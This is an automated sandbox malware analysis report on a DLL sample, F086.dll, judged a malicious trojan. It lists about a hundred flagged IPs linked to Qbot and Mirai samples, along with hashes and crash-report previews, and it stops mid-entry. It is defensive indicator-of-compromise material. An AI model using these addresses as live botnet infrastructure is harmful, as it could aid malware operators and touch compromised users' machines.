F086.dll	0%	ReversingLabs
F086.dll	0%	Virustotal		Browse

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
xfinity.com	68.87.41.40	true	false		high
www.xfinity.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://xfinity.com/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.xfinity.com/mobile/policies/broadband-disclosures	national[1].htm.24.dr	false	high
http://upx.sf.net	Amcache.hve.9.dr	false	high
https://www.xfinity.com/learn/internet-service/acp	national[1].htm.24.dr	false	high
https://www.xfinity.com/networkmanagement	national[1].htm.24.dr	false	high
https://streams.videolan.org/upload/	rundll32.exe, rundll32.exe, 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.488551661.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.495622337.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.504031322.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.504159065.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000012.00000002.508750049.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, F086.dll	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
2.82.8.80	unknown	Portugal	3243	MEO-RESIDENCIALPT	true
70.160.67.203	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
75.143.236.149	unknown	United States	20115	CHARTER-20115US	true
83.110.223.61	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	true
86.195.14.72	unknown	France	3215	FranceTelecom-OrangeFR	true
84.215.202.8	unknown	Norway	41164	GET-NOGETNorwayNO	true
184.182.66.109	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
92.186.69.229	unknown	France	12479	UNI2-ASES	true
174.4.89.3	unknown	Canada	6327	SHAWCA	true
161.142.103.187	unknown	Malaysia	9930	TTNET-MYTIMEdotComBerhadMY	true
114.143.176.236	unknown	India	17762	HTIL-TTML-IN-APTataTeleservicesMaharashtraLtdIN	true
14.192.241.76	unknown	Malaysia	9534	MAXIS-AS1-APBinariangBerhadMY	true
173.88.135.179	unknown	United States	10796	TWC-10796-MIDWESTUS	true
84.108.200.161	unknown	Israel	8551	BEZEQ-INTERNATIONAL-ASBezeqintInternetBackboneIL	true
47.34.30.133	unknown	United States	20115	CHARTER-20115US	true
183.87.163.165	unknown	India	132220	JPRDIGITAL-INJPRDigitalPvtLtdIN	true
184.181.75.148	unknown	United States	22773	ASN-CXA-ALL-CCI-22773-RDCUS	true
124.149.143.189	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
84.35.26.14	unknown	Netherlands	21221	INFOPACT-ASTheNetherlandsNL	true
73.29.92.128	unknown	United States	7922	COMCAST-7922US	true
68.203.69.96	unknown	United States	11427	TWC-11427-TEXASUS	true
82.131.141.209	unknown	Hungary	20845	DIGICABLEHU	true
64.121.161.102	unknown	United States	6079	RCN-ASUS	true
178.175.187.254	unknown	Moldova Republic of	43289	TRABIAMD	true
96.56.197.26	unknown	United States	6128	CABLE-NET-1US	true
186.64.67.30	unknown	Argentina	27953	NODOSUDSAAR	true
188.28.19.84	unknown	United Kingdom	206067	H3GUKGB	true
125.99.76.102	unknown	India	17488	HATHWAY-NET-APHathwayIPOverCableInternetIN	true
81.101.185.146	unknown	United Kingdom	5089	NTLGB	true
68.87.41.40	xfinity.com	United States	7922	COMCAST-7922US	false
59.28.84.65	unknown	Korea Republic of	4766	KIXS-AS-KRKoreaTelecomKR	true
105.186.128.181	unknown	South Africa	37457	Telkom-InternetZA	true
76.86.31.59	unknown	United States	20001	TWC-20001-PACWESTUS	true
147.147.30.126	unknown	United Kingdom	6871	PLUSNETUKInternetServiceProviderGB	true
96.87.28.170	unknown	United States	7922	COMCAST-7922US	true
75.109.111.89	unknown	United States	19108	SUDDENLINK-COMMUNICATIONSUS	true
78.92.133.215	unknown	Hungary	5483	MAGYAR-TELEKOM-MAIN-ASMagyarTelekomNyrtHU	true
124.122.47.148	unknown	Thailand	17552	TRUE-AS-APTrueInternetCoLtdTH	true
88.126.94.4	unknown	France	12322	PROXADFR	true
51.14.29.227	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	true
85.57.212.13	unknown	Spain	12479	UNI2-ASES	true
47.205.25.170	unknown	United States	5650	FRONTIER-FRTRUS	true
95.45.50.93	unknown	Ireland	5466	EIRCOMInternetHouseIE	true
80.12.88.148	unknown	France	3215	FranceTelecom-OrangeFR	true
69.133.162.35	unknown	United States	11426	TWC-11426-CAROLINASUS	true
86.132.236.117	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	true
151.62.238.176	unknown	Italy	1267	ASN-WINDTREIUNETEU	true
70.112.206.5	unknown	United States	11427	TWC-11427-TEXASUS	true
205.237.67.69	unknown	Canada	11290	CC-3272CA	true
102.159.188.125	unknown	Tunisia	37705	TOPNETTN	true
151.65.167.77	unknown	Italy	1267	ASN-WINDTREIUNETEU	true
76.178.148.107	unknown	United States	10838	OCEANIC-INTERNET-RRUS	true
89.36.206.69	unknown	Italy	48544	TECNOADSL-ASIT	true
69.242.31.249	unknown	United States	7922	COMCAST-7922US	true
193.253.100.236	unknown	France	3215	FranceTelecom-OrangeFR	true
76.16.49.134	unknown	United States	7922	COMCAST-7922US	true
94.207.104.225	unknown	United Arab Emirates	15802	DU-AS1AE	true
201.244.108.183	unknown	Colombia	19429	ETB-ColombiaCO	true
103.42.86.42	unknown	India	133660	EDIGITAL-ASE-InfrastructureandEntertainmentIndiaPvtLt	true
78.18.105.11	unknown	Ireland	2110	AS-BTIREBTIrelandwaspreviouslyknownasEsatNetEUnet	true
80.6.50.34	unknown	United Kingdom	5089	NTLGB	true
103.144.201.56	unknown	unknown	139762	MSSOLUTION-AS-APSolutionBD	true
27.0.48.233	unknown	India	132573	SAINGN-AS-INSAINGNNetworkServicesIN	true
70.28.50.223	unknown	Canada	577	BACOMCA	true
98.145.23.67	unknown	United States	20001	TWC-20001-PACWESTUS	true
47.149.134.231	unknown	United States	5650	FRONTIER-FRTRUS	true
82.125.44.236	unknown	France	3215	FranceTelecom-OrangeFR	true
81.229.117.95	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	true
89.129.109.27	unknown	Spain	12479	UNI2-ASES	true
122.186.210.254	unknown	India	9498	BBIL-APBHARTIAirtelLtdIN	true
79.77.142.22	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	true
90.78.147.141	unknown	France	3215	FranceTelecom-OrangeFR	true
122.184.143.86	unknown	India	9498	BBIL-APBHARTIAirtelLtdIN	true
186.75.95.6	unknown	Panama	11556	CableWirelessPanamaPA	true
50.68.186.195	unknown	Canada	6327	SHAWCA	true
12.172.173.82	unknown	United States	2386	INS-ASUS	true
213.64.33.61	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	true
79.168.224.165	unknown	Portugal	2860	NOS_COMUNICACOESPT	true
86.97.55.89	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	true
176.142.207.63	unknown	France	5410	BOUYGTEL-ISPFR	true
92.154.17.149	unknown	France	3215	FranceTelecom-OrangeFR	true
174.58.146.57	unknown	United States	7922	COMCAST-7922US	true
78.160.146.127	unknown	Turkey	9121	TTNETTR	true
58.186.75.42	unknown	Viet Nam	18403	FPT-AS-APTheCorporationforFinancingPromotingTechnolo	true
223.166.13.95	unknown	China	17621	CNCGROUP-SHChinaUnicomShanghainetworkCN	true
65.95.141.84	unknown	Canada	577	BACOMCA	true
50.68.204.71	unknown	Canada	6327	SHAWCA	true
71.38.155.217	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	true
104.35.24.154	unknown	United States	20001	TWC-20001-PACWESTUS	true
220.240.164.182	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
103.123.223.133	unknown	India	138329	KWS-AS-APKenstarWebSolutionsPrivateLimitedIN	true
24.198.114.130	unknown	United States	11351	TWC-11351-NORTHEASTUS	true
2.36.64.159	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
198.2.51.242	unknown	United States	20001	TWC-20001-PACWESTUS	true
92.9.45.20	unknown	United Kingdom	13285	OPALTELECOM-ASTalkTalkCommunicationsLimitedGB	true
113.11.92.30	unknown	Bangladesh	7565	BDCOM-BDRangsNiluSquare5thFloorHouse75Road5AD	true
69.119.123.159	unknown	United States	6128	CABLE-NET-1US	true
69.123.4.221	unknown	United States	6128	CABLE-NET-1US	true
172.115.17.50	unknown	United States	20001	TWC-20001-PACWESTUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	878699
Start date and time:	2023-05-31 01:58:10 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	F086.dll
Detection:	MAL
Classification:	mal96.troj.evad.winDLL@31/23@2/100
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 20.2% (good quality ratio 15.3%) Quality average: 55.6% Quality standard deviation: 38.7%
HCA Information:	Successful, ratio: 99% Number of executed functions: 23 Number of non-executed functions: 134
Cookbook Comments:	Found application associated with file extension: .dll Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): WerFault.exe, WMIADAP.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.89.179.12, 52.168.117.173, 52.182.143.212, 104.77.34.176
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, e10994.dscx.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, www.xfinity.com.edgekey.net, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com
Execution Graph export aborted for target rundll32.exe, PID 684 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
01:59:13	API Interceptor	5x Sleep call for process: WerFault.exe modified
01:59:18	API Interceptor	1x Sleep call for process: loaddll32.exe modified
01:59:28	API Interceptor	9x Sleep call for process: wermgr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
2.82.8.80	5q4psw.msi	Get hash	malicious	Qbot	Browse
	15dasx.msi	Get hash	malicious	Qbot	Browse
	5q4psw.msi	Get hash	malicious	Qbot	Browse
	15dasx.msi	Get hash	malicious	Qbot	Browse
	licking.dll	Get hash	malicious	Qbot	Browse
	licking.dll	Get hash	malicious	Qbot	Browse
	main2.dll	Get hash	malicious	Qbot	Browse
	r3zg12.msi	Get hash	malicious	Qbot	Browse
	main.dll	Get hash	malicious	Qbot	Browse
	r3zg12.msi	Get hash	malicious	Qbot	Browse
	main.dll	Get hash	malicious	Qbot	Browse
	graphically.dat.dll	Get hash	malicious	Qbot	Browse
	kxyj5.dat.dll	Get hash	malicious	Qbot	Browse
	PXNuYAPR.dat.dll	Get hash	malicious	Qbot	Browse
	TB9mkKe4Qzu.dat.dll	Get hash	malicious	Qbot	Browse
	leiotrichy.js	Get hash	malicious	Qbot	Browse
	a0UFMZnC6ltxphw.dat.dll	Get hash	malicious	Qbot	Browse
	msfilter.dll	Get hash	malicious	Qbot	Browse
	QPAWJ8VnpO.dll	Get hash	malicious	Qbot	Browse
	Cjpxxx.js	Get hash	malicious	Qbot	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
xfinity.com	dqVPlpmWYt.exe	Get hash	malicious	Unknown	Browse	96.118.152.230
xfinity.com	#Ubb38#Uc11c.exe.exe	Get hash	malicious	Tofsee Xmrig	Browse	96.118.48.114

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MEO-RESIDENCIALPT	5q4psw.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	15dasx.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	5q4psw.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	15dasx.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	licking.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	licking.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	main2.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	r3zg12.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	main.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	r3zg12.msi	Get hash	malicious	Qbot	Browse	2.82.8.80
	main.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	graphically.dat.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	LEo7jDCX96.elf	Get hash	malicious	Mirai	Browse	2.81.219.243
	yvweY4vsVq.elf	Get hash	malicious	Mirai	Browse	188.81.116.228
	8C3RpG9eka.elf	Get hash	malicious	Mirai	Browse	85.244.28.246
	Pc8ewtsPRR.elf	Get hash	malicious	Mirai	Browse	85.240.179.8
	33cWz2DNq2.elf	Get hash	malicious	Mirai	Browse	2.83.183.198
	pu3jOk0Q9u.elf	Get hash	malicious	Mirai	Browse	82.155.117.104
	6mu5y2WWPK.elf	Get hash	malicious	Mirai	Browse	85.246.119.61
	A6BM2Ru5xc.elf	Get hash	malicious	Mirai	Browse	37.189.107.20
ASN-CXA-ALL-CCI-22773-RDCUS	5q4psw.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	15dasx.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	5q4psw.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	15dasx.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	licking.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	licking.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	main2.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	r3zg12.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	main.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	r3zg12.msi	Get hash	malicious	Qbot	Browse	184.181.75.148
	main.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	graphically.dat.dll	Get hash	malicious	Qbot	Browse	184.181.75.148
	UMyY7qXi7b.elf	Get hash	malicious	Mirai	Browse	68.6.72.41
	udxyqUncDs.elf	Get hash	malicious	Gafgyt, Mirai	Browse	184.188.248.242
	KipHfbWc5u.elf	Get hash	malicious	Mirai	Browse	174.74.5.188
	CT1zp877iP.elf	Get hash	malicious	Mirai	Browse	68.108.254.249
	65cBS6uCoV.elf	Get hash	malicious	Mirai	Browse	70.187.92.80
	gLeiWqaVuD.elf	Get hash	malicious	Mirai	Browse	24.249.120.101
	RW3fkwplaC.elf	Get hash	malicious	Mirai	Browse	70.171.100.214
	i12DwPGkzd.elf	Get hash	malicious	Mirai	Browse	68.101.71.203

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Gardenizes.exe	Get hash	malicious	FormBook, GuLoader	Browse	68.87.41.40
	FACTURA_ONLINE.jse	Get hash	malicious	Unknown	Browse	68.87.41.40
	FACTURA_ONLINE.jse	Get hash	malicious	Unknown	Browse	68.87.41.40
	Quote_Request_xlsx_PDF_PDF.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	68.87.41.40
	DHL_AWB_50_No3354087.docx.doc	Get hash	malicious	Unknown	Browse	68.87.41.40
	rechnm696417531.js	Get hash	malicious	Unknown	Browse	68.87.41.40
	rechnm696417531.js	Get hash	malicious	Unknown	Browse	68.87.41.40
	ORDER-232903AF.js	Get hash	malicious	WSHRat	Browse	68.87.41.40
	main.dll	Get hash	malicious	Qbot	Browse	68.87.41.40
	008s06523610054680b6011375030062022.exe	Get hash	malicious	GuLoader	Browse	68.87.41.40
	file.exe	Get hash	malicious	PrivateLoader	Browse	68.87.41.40
	rechnm128132812.js	Get hash	malicious	Unknown	Browse	68.87.41.40
	rechnm128132812.js	Get hash	malicious	Unknown	Browse	68.87.41.40
	ARMSTRONG5262023.xlsx	Get hash	malicious	Unknown	Browse	68.87.41.40
	setup.exe	Get hash	malicious	PrivateLoader	Browse	68.87.41.40
	ufuldkommenhederne.exe	Get hash	malicious	FormBook, GuLoader	Browse	68.87.41.40
	08194399.exe	Get hash	malicious	Djvu	Browse	68.87.41.40
	09498299.exe	Get hash	malicious	Babuk, Djvu	Browse	68.87.41.40
	03543999.exe	Get hash	malicious	Djvu	Browse	68.87.41.40
	56#U044f.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	68.87.41.40

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_92f46c7f299346a6ffcb64477668158ac3e1de1_82810a17_115c31ef\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9055530276531717
Encrypted:	false
SSDEEP:	192:efDtJid0oXPHBUZMX4jed+y/u7skS274ItWc:0JizXPBUZMX4je//u7skX4ItWc
MD5:	AF18B553EC67FCDEF7BDBA2170BD4B92
SHA1:	C44C450B0CA548BA4431B057CF785368021EF4FF
SHA-256:	0BAA393E8562FE0131FFD8C6E7BC4C79447DA588742A2DBC2965BFDEEF13CC66
SHA-512:	0C8B54A30E622787F05B6F420CA4A946052984107E9FCEFC022DED13932FE391D4523D38A1EA8D700F3CC52691B81FDF913FCCD7FB71EE3C90A130ABB1B7B60D
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.5.6.3.0.1.5.5.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.6.3.8.0.1.6.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.e.e.9.c.6.a.-.1.3.9.9.-.4.5.e.3.-.9.6.9.0.-.4.1.5.6.7.9.3.f.a.5.9.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.b.3.a.0.5.5.-.8.5.4.0.-.4.2.9.e.-.a.3.4.0.-.b.5.b.b.c.8.7.1.c.a.d.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.3.c.-.0.0.0.1.-.0.0.1.a.-.0.5.2.0.-.d.c.2.c.9.e.9.3.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_92f46c7f299346a6ffcb64477668158ac3e1de1_82810a17_1bf84170\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9052764652862895
Encrypted:	false
SSDEEP:	192:cS0zip0oXBHBUZMX4jed+y/u7skS274ItWc:8ziHXRBUZMX4je//u7skX4ItWc
MD5:	15C8CDA5A28B3171E528E79E6E234456
SHA1:	A41D05F8FA66EE4212EF3573C8EFC29988650F03
SHA-256:	272CE77BFAB3C1FC9F9BB8B2CE4F8740170DE34C9CFF2AF5CC66DF7FA5F69BEB
SHA-512:	4A00F30AF7B1E5A269AE7E45045219817FF5C7A704DEA76D52E5B069B30D8C0066F4D5B6FB963B2291AA83C2923B4321DBCE17454F2659AE40044D46489D17CF
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.9.0.4.5.3.8.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.9.9.7.1.6.0.2.4.8.5.1.2.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.f.c.9.1.3.b.-.6.c.9.8.-.4.0.4.2.-.9.9.e.2.-.1.8.e.d.0.8.9.4.0.c.f.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.d.a.f.9.8.4.-.1.a.3.c.-.4.5.d.c.-.9.4.6.0.-.6.1.6.6.0.9.e.7.4.4.3.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.4.-.0.0.0.1.-.0.0.1.a.-.d.e.6.5.-.c.4.2.e.9.e.9.3.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_e81cd1d5139fff9fe89f63caf8b194b6696e72da_82810a17_0aac24e0\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9052291517948012
Encrypted:	false
SSDEEP:	192:shiK0oXDHBUZMX4jed+y/u7skS274ItWc:2icXDBUZMX4je//u7skX4ItWc
MD5:	77352191DB2CF40C3543835B77D6C396
SHA1:	5ECC9072BBF244687393F704313D600A600DAECF
SHA-256:	2AED6978324591A9826C1075FF75C69E4E15A62986292F35F4EF74927176E787
SHA-512:	1F707CAF6D8A3E8966C96D4D72C75FB814671952BA6BD2595AD6369B5A6A1197647886EA5E0D8CE9A72EC9D8ED7FD4CCA8BA5363AEE656E3D9B10E8889C8A17A
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.0.2.8.2.0.6.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.1.3.9.1.4.2.5.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.9.7.e.d.7.1.5.-.1.c.e.d.-.4.1.3.4.-.b.2.7.8.-.8.5.b.f.4.8.5.3.5.5.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.d.6.e.f.7.6.9.-.6.1.7.d.-.4.c.6.2.-.b.2.a.c.-.7.3.d.e.3.4.4.8.6.7.2.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.2.a.c.-.0.0.0.1.-.0.0.1.a.-.f.d.5.8.-.3.9.2.9.9.e.9.3.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_e81cd1d5139fff9fe89f63caf8b194b6696e72da_82810a17_16cc24ef\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9052042795414165
Encrypted:	false
SSDEEP:	192:/32iox0oXpHBUZMX4jed+y/u7skS274ItWc:uio/XZBUZMX4je//u7skX4ItWc
MD5:	CFF1DC224E66E7C9A7609947F684DA79
SHA1:	259218C1702375FA4A24E5E1787233AEAB166DB7
SHA-256:	8C771BC18083265E2837C83585C0A7C9679B5B6B2A4733760C606F46BE2FBC47
SHA-512:	F4A9A4741B04B3E1F369D77161DE7B506FF2867BDB679EC0BEB8C9CD4AF8D8C8EB75C1D31FA76327CFD2BFCB412C0DCF0177A891E35913D119ADB69AB9A1A067
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.0.2.0.7.5.0.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.2.9.9.9.7.1.5.1.4.1.0.3.5.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.c.f.0.9.2.a.-.0.8.c.8.-.4.3.0.3.-.b.3.0.9.-.f.7.3.9.5.4.2.e.3.b.9.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.b.7.3.6.5.b.f.-.d.c.4.0.-.4.d.3.2.-.a.0.d.a.-.e.9.c.3.2.1.0.0.a.d.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.f.0.-.0.0.0.1.-.0.0.1.a.-.c.a.9.e.-.3.c.2.9.9.e.9.3.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_e81cd1d5139fff9fe89f63caf8b194b6696e72da_82810a17_1b044132\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	65536
Entropy (8bit):	0.9052227737497617
Encrypted:	false
SSDEEP:	192:uErih0oXrHBUZMX4jed+y/u7skS274ItWc:1iPXLBUZMX4je//u7skX4ItWc
MD5:	7073C2C15CA3CA17313B5CC045C7D742
SHA1:	593F997AE259507F7E21C3DEA67B660D845515CB
